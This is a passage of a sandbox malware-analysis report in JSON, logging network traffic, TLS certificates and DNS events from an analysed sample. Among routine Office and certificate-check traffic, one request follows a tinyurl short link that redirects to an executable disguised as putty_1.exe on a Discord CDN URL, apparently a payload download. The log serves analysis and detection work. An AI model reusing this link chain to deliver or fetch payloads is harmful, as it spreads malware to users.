"request":"GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: ocsp.comodoca4.com",
"uri":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D",
"response":"HTTP/1.1 200 OK\\r\\nDate: Wed, 09 Dec 2020 14:54:18 GMT\\r\\nContent-Type: application/ocsp-response\\r\\nLast-Modified: Wed, 09 Dec 2020 00:48:24 GMT\\r\\nAccept-Ranges: bytes\\r\\nServer: Apache\\r\\nETag: A2E1E7A1B5C21B0C07B99B6DB8BA4C7C837F88E4\\r\\nCache-Control: max-age=554906,s-maxage=1800,public,no-transform,must-revalidate\\r\\nX-OCSP-Responder-ID: mcdpcaocsp10\\r\\nX-HW: 1607525658.cds040.sk1.h2,1607525658.cds065.sk1.c\\r\\nConnection: keep-alive\\r\\nContent-Length: 727",
"host":"ocsp.comodoca4.com",
"dport":80,
"path":"/root/.cuckoo/storage/analyses/4405/network/a2e1e7a1b5c21b0c07b99b6db8ba4c7c837f88e4",
"sport":49202,
"method":"GET",
"md5":"3089d8b262d86243ac8c1fef010f0b13"
},
{
"status":200,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/31abb46a29500f764bb8d10e6c55828b7711d791",
"sha1":"31abb46a29500f764bb8d10e6c55828b7711d791",
"md5":"89a6263180539bbdcae1308db6416a6e"
},
"sha1":"31abb46a29500f764bb8d10e6c55828b7711d791",
"protocol":"http",
"dst":"151.139.128.14",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"request":"GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQAU7Bfe6xSRj1%2Bo83zCN%2BY2wTgIAQU1LD0%2FU%2BcQqRs3D0u7ltBGMmtA%2FYCEQCGAJT1BA7oz3fngde5x7hq HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: ocsp.comodoca4.com",
"uri":"/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQAU7Bfe6xSRj1%2Bo83zCN%2BY2wTgIAQU1LD0%2FU%2BcQqRs3D0u7ltBGMmtA%2FYCEQCGAJT1BA7oz3fngde5x7hq",
"response":"HTTP/1.1 200 OK\\r\\nDate: Wed, 09 Dec 2020 14:54:24 GMT\\r\\nContent-Type: application/ocsp-response\\r\\nLast-Modified: Sun, 06 Dec 2020 13:03:01 GMT\\r\\nAccept-Ranges: bytes\\r\\nServer: Apache\\r\\nETag: 31ABB46A29500F764BB8D10E6C55828B7711D791\\r\\nCache-Control: max-age=338579,s-maxage=1800,public,no-transform,must-revalidate\\r\\nX-OCSP-Responder-ID: mcdpcaocsp3\\r\\nX-HW: 1607525664.cds040.sk1.h2,1607525664.cds211.sk1.c\\r\\nConnection: keep-alive\\r\\nContent-Length: 472",
"host":"ocsp.comodoca4.com",
"dport":80,
"path":"/root/.cuckoo/storage/analyses/4405/network/31abb46a29500f764bb8d10e6c55828b7711d791",
"sport":49202,
"method":"GET",
"md5":"89a6263180539bbdcae1308db6416a6e"
},
{
"status":200,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/d1f705a6af0a13224d2c1733b0dc98f9f575f3ab",
"sha1":"d1f705a6af0a13224d2c1733b0dc98f9f575f3ab",
"md5":"d18470ec18abb745ec633d92013f9775"
},
"sha1":"d1f705a6af0a13224d2c1733b0dc98f9f575f3ab",
"protocol":"http",
"dst":"151.139.128.14",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"request":"GET /COMODORSADomainValidationSecureServerCA2.crl HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: */*\\r\\nUser-Agent: Microsoft-CryptoAPI/6.1\\r\\nHost: crl.comodoca4.com",
"uri":"/COMODORSADomainValidationSecureServerCA2.crl",
"response":"HTTP/1.1 200 OK\\r\\nDate: Wed, 09 Dec 2020 14:54:26 GMT\\r\\nContent-Type: application/pkix-crl\\r\\nLast-Modified: Wed, 09 Dec 2020 07:11:49 GMT\\r\\nAccept-Ranges: bytes\\r\\nServer: nginx\\r\\nETag: \"5fd078b5-238\"\\r\\nX-CCACDN-Mirror-ID: mscrl1\\r\\nCache-Control: max-age=14400, s-maxage=3600\\r\\nX-CCACDN-Proxy-ID: mcdpinlb1\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-HW: 1607525666.cds017.sk1.h2,1607525666.cds066.sk1.c\\r\\nConnection: keep-alive\\r\\nContent-Length: 568",
"host":"crl.comodoca4.com",
"dport":80,
"path":"/root/.cuckoo/storage/analyses/4405/network/d1f705a6af0a13224d2c1733b0dc98f9f575f3ab",
"sport":49203,
"method":"GET",
"md5":"d18470ec18abb745ec633d92013f9775"
}
],
"domains":[
{
"ip":"104.20.139.65",
"domain":"tinyurl.com",
"whitelisted":true,
"country_name":""
},
{
"ip":"52.109.88.177",
"domain":"officeclient.microsoft.com",
"whitelisted":true,
"country_name":""
},
{
"ip":"52.109.12.21",
"domain":"nexus.officeapps.live.com",
"whitelisted":true,
"country_name":""
},
{
"ip":"151.139.128.14",
"domain":"ocsp.comodoca4.com",
"whitelisted":true,
"country_name":""
},
{
"ip":"52.109.76.32",
"domain":"nexusrules.officeapps.live.com",
"whitelisted":true,
"country_name":""
},
{
"ip":"151.139.128.14",
"domain":"ocsp.comodoca.com",
"whitelisted":true,
"country_name":""
},
{
"ip":"23.34.174.14",
"domain":"www.microsoft.com",
"whitelisted":true,
"country_name":""
},
{
"ip":"151.139.128.14",
"domain":"crl.comodoca4.com",
"whitelisted":true,
"country_name":""
},
{
"ip":"93.184.220.29",
"domain":"ocsp.digicert.com",
"whitelisted":true,
"country_name":""
},
{
"ip":"184.28.22.24",
"domain":"www.download.windowsupdate.com",
"whitelisted":true,
"country_name":""
},
{
"ip":"162.159.130.233",
"domain":"cdn.discordapp.com",
"whitelisted":true,
"country_name":""
}
],
"dead_hosts":[
],
"sorted_pcap_sha256":"38fade10073f749d399b411c69c0ca01dd50ba0ece5cf874e195e5059c1571ab",
"irc":[
],
"https_ex":[
{
"status":200,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/f55807b89f99b6250782049f59b5eb7fa128b580",
"sha1":"f55807b89f99b6250782049f59b5eb7fa128b580",
"md5":"4c394e49dd405896602cb0513a5c8e12"
},
"sha1":"f55807b89f99b6250782049f59b5eb7fa128b580",
"protocol":"https",
"dst":"52.109.76.68",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"request":"GET /config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4266&crev=3 HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept-Encoding: gzip\\r\\nUser-Agent: Microsoft Office/16.0 (Windows NT 6.1; Microsoft Excel 16.0.4266; Pro)\\r\\nX-IDCRL_ACCEPTED: t\\r\\nX-Office-Version: 16.0.4266\\r\\nX-Office-Application: 1\\r\\nX-Office-Platform: Win32\\r\\nX-Office-SqmUserId: {54C7745C-E82A-4B14-AF84-02BBDE98E04D}\\r\\nX-Office-LastUpdate: 2018-08-17T07:35:06Z\\r\\nHost: officeclient.microsoft.com",
"uri":"/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4266&crev=3",
"response":"HTTP/1.1 200 OK\\r\\nCache-Control: no-cache\\r\\nPragma: no-cache\\r\\nContent-Type: text/xml\\r\\nContent-Encoding: gzip\\r\\nExpires: -1\\r\\nVary: Accept-Encoding\\r\\nServer: Microsoft-IIS/10.0\\r\\nX-CorrelationId: bb8e7e5f-4605-4a1c-8c6b-de2ed7eed300\\r\\nX-OfficeFE: ConfigFE_IN_2\\r\\nX-OfficeVersion: 16.0.13608.30527\\r\\nX-OfficeCluster: neu-config.officeapps.live.com\\r\\nX-Content-Type-Options: nosniff\\r\\nX-AspNet-Version: 4.0.30319\\r\\nX-Office-CacheClearDate: 2009-01-01T00:00:00\\r\\nX-Office-CacheDuration: 1440\\r\\nX-Powered-By: ASP.NET\\r\\nDate: Wed, 09 Dec 2020 14:53:34 GMT\\r\\nContent-Length: 19691",
"host":"officeclient.microsoft.com",
"dport":443,
"path":"/root/.cuckoo/storage/analyses/4405/network/f55807b89f99b6250782049f59b5eb7fa128b580",
"sport":49174,
"method":"GET",
"md5":"4c394e49dd405896602cb0513a5c8e12"
},
{
"status":302,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/58cfcdca5ed542240131e60e7a5af5e83f61e786",
"sha1":"58cfcdca5ed542240131e60e7a5af5e83f61e786",
"md5":"4202ef115ebede37eb22297113f5fb32"
},
"sha1":"58cfcdca5ed542240131e60e7a5af5e83f61e786",
"protocol":"https",
"dst":"52.109.12.21",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"request":"GET /nexus/rules?Application=excel.exe&Version=16.0.4266.1001&ClientId=%7b54C7745C-E82A-4B14-AF84-02BBDE98E04D%7d& HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nAccept: application/vnd.ms-nexus-rules-v12+xml\\r\\nAccept-Encoding: gzip\\r\\nUser-Agent: Microsoft Office/16.0 (Windows NT 6.1; Microsoft Excel 16.0.4266; Pro)\\r\\nX-MS-Collection-Policy: ExternalRestrictive, Heartbeat\\r\\nX-MS-Process-Session-Id: {953203D4-D733-4CA5-BC11-BE18B0E4A05C}\\r\\nHost: nexus.officeapps.live.com",
"uri":"/nexus/rules?Application=excel.exe&Version=16.0.4266.1001&ClientId=%7b54C7745C-E82A-4B14-AF84-02BBDE98E04D%7d&",
"response":"HTTP/1.1 302 Found\\r\\nCache-Control: max-age=2700\\r\\nContent-Length: 8\\r\\nContent-Type: text/plain; charset=utf-8\\r\\nLast-Modified: Wed, 09 Dec 2020 14:53:38 GMT\\r\\nLocation: https://nexusrules.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4266.1001&ClientId=%7B54C7745C-E82A-4B14-AF84-02BBDE98E04D%7D&=\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-AspNet-Version: 4.0.30319\\r\\nX-Powered-By: ASP.NET\\r\\nX-Content-Type-Options: nosniff\\r\\nAccess-Control-Allow-Origin: *\\r\\nAccess-Control-Allow-Headers: Content-Type\\r\\nAccess-Control-Allow-Methods: POST, OPTIONS\\r\\nAccess-Control-Max-Age: 300\\r\\nDate: Wed, 09 Dec 2020 14:53:37 GMT",
"host":"nexus.officeapps.live.com",
"dport":443,
"path":"/root/.cuckoo/storage/analyses/4405/network/58cfcdca5ed542240131e60e7a5af5e83f61e786",
"sport":49176,
"method":"GET",
"md5":"4202ef115ebede37eb22297113f5fb32"
},
{
"status":301,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/23b9f4eafd34c3abdc70d4057ea90f87fc188244",
"sha1":"23b9f4eafd34c3abdc70d4057ea90f87fc188244",
"md5":"bcbcf0062b123c5c9d77a037a172cdb1"
},
"sha1":"23b9f4eafd34c3abdc70d4057ea90f87fc188244",
"protocol":"https",
"dst":"104.20.139.65",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"request":"GET /y54lptvl HTTP/1.1\\r\\nAccept: */*\\r\\nAccept-Encoding: gzip, deflate\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\\r\\nHost: tinyurl.com\\r\\nConnection: Keep-Alive",
"uri":"/y54lptvl",
"response":"HTTP/1.1 301 Moved Permanently\\r\\nDate: Wed, 09 Dec 2020 14:53:45 GMT\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nTransfer-Encoding: chunked\\r\\nConnection: keep-alive\\r\\nSet-Cookie: __cfduid=d72fc04ac9fb3953251abbfaf1f2f83571607525625; expires=Fri, 08-Jan-21 14:53:45 GMT; path=/; domain=.tinyurl.com; HttpOnly; SameSite=Lax\\r\\nX-Powered-By: PHP/7.3.22\\r\\nLocation: https://cdn.discordapp.com/attachments/767360657930190894/767360694722756618/putty_1.exe\\r\\nCache-Control: max-age=0, public, s-max-age=900, stale-if-error: 86400\\r\\nReferrer-Policy: unsafe-url\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\\r\\nCF-Cache-Status: DYNAMIC\\r\\ncf-request-id: 06e99786b50000d8a96e0a6000000001\\r\\nExpect-CT: max-age=604800, report-uri=\"https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct\"\\r\\nServer: cloudflare\\r\\nCF-RAY: 5fef8eb78d7fd8a9-CPH",
"host":"tinyurl.com",
"dport":443,
"path":"/root/.cuckoo/storage/analyses/4405/network/23b9f4eafd34c3abdc70d4057ea90f87fc188244",
"sport":49175,
"method":"GET",
"md5":"bcbcf0062b123c5c9d77a037a172cdb1"
},
{
"status":201,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"protocol":"https",
"dst":"52.109.12.21",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/26ff0335c1a4c033cdbc9aeb07d472b6d114f68c",
"sha1":"26ff0335c1a4c033cdbc9aeb07d472b6d114f68c",
"md5":"a63e126a9a1e9f53b57cf831290bf539"
},
"request":"POST /nexus/upload/%7b20E311A8-411A-4C4D-A632-7744661495A1%7d HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nContent-Type: application/vnd.ms-nexus-telemetrydata-v3+bond\\r\\nUser-Agent: Microsoft Office/16.0 (Windows NT 6.1; Microsoft Word 16.0.4266; Pro)\\r\\nX-MS-Is-Low-End-Device: 0\\r\\nContent-Length: 111\\r\\nHost: nexus.officeapps.live.com",
"uri":"/nexus/upload/%7b20E311A8-411A-4C4D-A632-7744661495A1%7d",
"response":"HTTP/1.1 201 Created\\r\\nCache-Control: no-cache\\r\\nPragma: no-cache\\r\\nExpires: -1\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-MS-Upload-Bucket-Duration: 3600\\r\\nX-MS-Upload-Limit: 1048576\\r\\nX-MS-Medium-Cost-Upload-Bucket-Duration: 86400\\r\\nX-MS-Medium-Cost-Upload-Limit: 2048\\r\\nX-MS-Disk-Limit: 26214400\\r\\nX-MS-Spike-Duration: 300\\r\\nX-MS-Spike-Factor: 5\\r\\nX-MS-LogQueue-Limit: 5120\\r\\nX-AspNet-Version: 4.0.30319\\r\\nX-Powered-By: ASP.NET\\r\\nX-Content-Type-Options: nosniff\\r\\nAccess-Control-Allow-Origin: *\\r\\nAccess-Control-Allow-Headers: Content-Type\\r\\nAccess-Control-Allow-Methods: POST, OPTIONS\\r\\nAccess-Control-Max-Age: 300\\r\\nDate: Wed, 09 Dec 2020 14:54:31 GMT\\r\\nContent-Length: 0",
"host":"nexus.officeapps.live.com",
"dport":443,
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sport":49206,
"method":"POST",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
{
"status":201,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"protocol":"https",
"dst":"52.109.12.21",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/2812b21629447367ad24c70f671f6d3cb1720966",
"sha1":"2812b21629447367ad24c70f671f6d3cb1720966",
"md5":"c67878a91eb1fa94d3a31d4ca8f46c64"
},
"request":"POST /nexus/upload/%7bDAB34A62-E36C-4388-9234-517A78D7E0BA%7d HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nContent-Type: application/vnd.ms-nexus-telemetrydata-v3+bond\\r\\nUser-Agent: Microsoft Office/16.0 (Windows NT 6.1; Microsoft Excel 16.0.4266; Pro)\\r\\nX-MS-Is-Low-End-Device: 0\\r\\nContent-Length: 532\\r\\nHost: nexus.officeapps.live.com",
"uri":"/nexus/upload/%7bDAB34A62-E36C-4388-9234-517A78D7E0BA%7d",
"response":"HTTP/1.1 201 Created\\r\\nCache-Control: no-cache\\r\\nPragma: no-cache\\r\\nExpires: -1\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-MS-Upload-Bucket-Duration: 3600\\r\\nX-MS-Upload-Limit: 1048576\\r\\nX-MS-Medium-Cost-Upload-Bucket-Duration: 86400\\r\\nX-MS-Medium-Cost-Upload-Limit: 2048\\r\\nX-MS-Disk-Limit: 26214400\\r\\nX-MS-Spike-Duration: 300\\r\\nX-MS-Spike-Factor: 5\\r\\nX-MS-LogQueue-Limit: 5120\\r\\nX-AspNet-Version: 4.0.30319\\r\\nX-Powered-By: ASP.NET\\r\\nX-Content-Type-Options: nosniff\\r\\nAccess-Control-Allow-Origin: *\\r\\nAccess-Control-Allow-Headers: Content-Type\\r\\nAccess-Control-Allow-Methods: POST, OPTIONS\\r\\nAccess-Control-Max-Age: 300\\r\\nDate: Wed, 09 Dec 2020 14:54:43 GMT\\r\\nContent-Length: 0",
"host":"nexus.officeapps.live.com",
"dport":443,
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sport":49219,
"method":"POST",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
{
"status":201,
"src":"192.168.56.104",
"resp":{
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
},
"sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709",
"protocol":"https",
"dst":"52.109.12.21",
"req":{
"path":"/root/.cuckoo/storage/analyses/4405/network/c3a83827aac9069e4fba8b3002afbbb3de4fdaae",
"sha1":"c3a83827aac9069e4fba8b3002afbbb3de4fdaae",
"md5":"08be9c29fd23a68d1e2a70a83fa87444"
},
"request":"POST /nexus/upload/%7bEB8A3342-F3D2-4728-96D4-488F6220D276%7d HTTP/1.1\\r\\nConnection: Keep-Alive\\r\\nContent-Type: application/vnd.ms-nexus-telemetrydata-v3+bond\\r\\nUser-Agent: Microsoft Office/16.0 (Windows NT 6.1; Microsoft Excel 16.0.4266; Pro)\\r\\nX-MS-Is-Low-End-Device: 0\\r\\nContent-Length: 211\\r\\nHost: nexus.officeapps.live.com",
"uri":"/nexus/upload/%7bEB8A3342-F3D2-4728-96D4-488F6220D276%7d",
"response":"HTTP/1.1 201 Created\\r\\nCache-Control: no-cache\\r\\nPragma: no-cache\\r\\nExpires: -1\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-MS-Upload-Bucket-Duration: 3600\\r\\nX-MS-Upload-Limit: 1048576\\r\\nX-MS-Medium-Cost-Upload-Bucket-Duration: 86400\\r\\nX-MS-Medium-Cost-Upload-Limit: 2048\\r\\nX-MS-Disk-Limit: 26214400\\r\\nX-MS-Spike-Duration: 300\\r\\nX-MS-Spike-Factor: 5\\r\\nX-MS-LogQueue-Limit: 5120\\r\\nX-AspNet-Version: 4.0.30319\\r\\nX-Powered-By: ASP.NET\\r\\nX-Content-Type-Options: nosniff\\r\\nAccess-Control-Allow-Origin: *\\r\\nAccess-Control-Allow-Headers: Content-Type\\r\\nAccess-Control-Allow-Methods: POST, OPTIONS\\r\\nAccess-Control-Max-Age: 300\\r\\nDate: Wed, 09 Dec 2020 14:54:43 GMT\\r\\nContent-Length: 0",
"host":"nexus.officeapps.live.com",
"dport":443,
"path":"/root/.cuckoo/storage/analyses/4405/network/da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sport":49219,
"method":"POST",
"md5":"d41d8cd98f00b204e9800998ecf8427e"
}
]
},
"suricata":{
"tls":[
{
"src_ip":"192.168.56.104",
"dst_ip":"104.20.139.65",
"cert":"Subject='C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com' Issuerdn='C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2' SHA1='e3:e3:99:52:4c:27:32:02:06:36:ef:fc:74:fa:1d:4e:2e:0f:a1:5f' VERSION='TLSv1'",
"src_port":49175,
"dst_port":443
},
{
"src_ip":"192.168.56.104",
"dst_ip":"52.109.76.68",
"cert":"Subject='CN=config.officeapps.live.com' Issuerdn='C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02' SHA1='04:de:6a:ee:ef:54:99:e0:fc:f0:83:23:f8:ba:0e:48:6c:89:6e:d4' VERSION='TLSv1'",
"src_port":49174,
"dst_port":443
},
{
"src_ip":"192.168.56.104",
"dst_ip":"52.109.76.32",
"cert":"Subject='CN=nexusrules.officeapps.live.com' Issuerdn='C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02' SHA1='fa:10:61:47:07:3c:4f:2b:31:3c:22:a0:51:5b:1b:bb:42:2d:a8:9c' VERSION='TLSv1'",
"src_port":49178,
"dst_port":443
},
{
"src_ip":"192.168.56.104",
"dst_ip":"52.109.12.21",
"cert":"Subject='CN=nexus.officeapps.live.com' Issuerdn='C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01' SHA1='7b:00:e2:a3:8c:b3:2b:b9:f6:df:cc:37:7a:ed:6b:48:e9:0b:c1:3b' VERSION='TLSv1'",
"src_port":49176,
"dst_port":443
},
{
"src_ip":"192.168.56.104",
"dst_ip":"162.159.130.233",
"cert":"Subject='CN=ssl711319.cloudflaressl.com' Issuerdn='C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA 2' SHA1='f6:9d:91:4d:42:41:01:89:e8:49:e7:bb:98:46:48:e3:f4:7a:5a:bd' VERSION='TLSv1'",
"src_port":49179,
"dst_port":443
},
{
"src_ip":"192.168.56.104",
"dst_ip":"52.109.12.21",
"cert":"Subject='CN=nexus.officeapps.live.com' Issuerdn='C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01' SHA1='7b:00:e2:a3:8c:b3:2b:b9:f6:df:cc:37:7a:ed:6b:48:e9:0b:c1:3b' VERSION='TLSv1'",
"src_port":49206,
"dst_port":443
},
{
"src_ip":"192.168.56.104",
"dst_ip":"52.109.12.21",
"cert":"Subject='CN=nexus.officeapps.live.com' Issuerdn='C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01' SHA1='7b:00:e2:a3:8c:b3:2b:b9:f6:df:cc:37:7a:ed:6b:48:e9:0b:c1:3b' VERSION='TLSv1'",
"src_port":49219,
"dst_port":443
}
],
"evejson":[
{
"src_port":53894,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":41,
"timestamp":"2020-12-09T15:53:28.560947+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"102.56.168.192.in-addr.arpa",
"type":"query",
"id":28920
},
"flow_id":2137712142880563,
"dest_port":53,
"dest_ip":"192.168.56.1"
},
{
"src_port":57211,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":43,
"timestamp":"2020-12-09T15:53:28.576453+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"2.b.3.e.7.4.f.3.7.5.d.0.a.d.c.f.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa",
"type":"query",
"id":60444
},
"flow_id":1385964017077189,
"dest_port":53,
"dest_ip":"192.168.56.1"
},
{
"src_port":64248,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":42,
"timestamp":"2020-12-09T15:53:28.575887+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"7.2.3.3.1.6.3.3.0.7.6.3.a.f.1.9.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa",
"type":"query",
"id":21149
},
"flow_id":1275712206588303,
"dest_port":53,
"dest_ip":"192.168.56.1"
},
{
"src_port":53894,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":69,
"timestamp":"2020-12-09T15:53:29.553044+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"102.56.168.192.in-addr.arpa",
"type":"query",
"id":28920
},
"flow_id":1438749165187156,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":64248,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":70,
"timestamp":"2020-12-09T15:53:29.569016+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"7.2.3.3.1.6.3.3.0.7.6.3.a.f.1.9.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa",
"type":"query",
"id":21149
},
"flow_id":655368605249208,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":53525,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":89,
"timestamp":"2020-12-09T15:53:30.078227+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"8.8.8.8.in-addr.arpa",
"type":"query",
"id":3322
},
"flow_id":148729968079251,
"dest_port":53,
"dest_ip":"192.168.56.1"
},
{
"src_port":53525,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":111,
"timestamp":"2020-12-09T15:53:31.068657+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"8.8.8.8.in-addr.arpa",
"type":"query",
"id":3322
},
"flow_id":1439715532934193,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":57211,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":88,
"timestamp":"2020-12-09T15:53:30.069294+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"2.b.3.e.7.4.f.3.7.5.d.0.a.d.c.f.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa",
"type":"query",
"id":60444
},
"flow_id":1016171627941550,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":59575,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":118,
"timestamp":"2020-12-09T15:53:31.222828+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"105.56.168.192.in-addr.arpa",
"type":"query",
"id":40699
},
"flow_id":126559346976364,
"dest_port":53,
"dest_ip":"192.168.56.1"
},
{
"src_port":53894,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":71,
"timestamp":"2020-12-09T15:53:29.595787+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"102.56.168.192.in-addr.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"type":"answer",
"id":28920
},
"flow_id":1438749165187156,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":53525,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":112,
"timestamp":"2020-12-09T15:53:31.111545+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NOERROR",
"rrtype":"PTR",
"rrname":"8.8.8.8.in-addr.arpa",
"answers":[
{
"rrtype":"PTR",
"rrname":"8.8.8.8.in-addr.arpa",
"rdata":"dns.google",
"ttl":21134
}
],
"rd":true,
"grouped":{
"PTR":[
"dns.google"
]
},
"version":2,
"flags":"8180",
"ra":true,
"type":"answer",
"id":3322
},
"flow_id":1439715532934193,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":58700,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":117,
"timestamp":"2020-12-09T15:53:31.212790+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
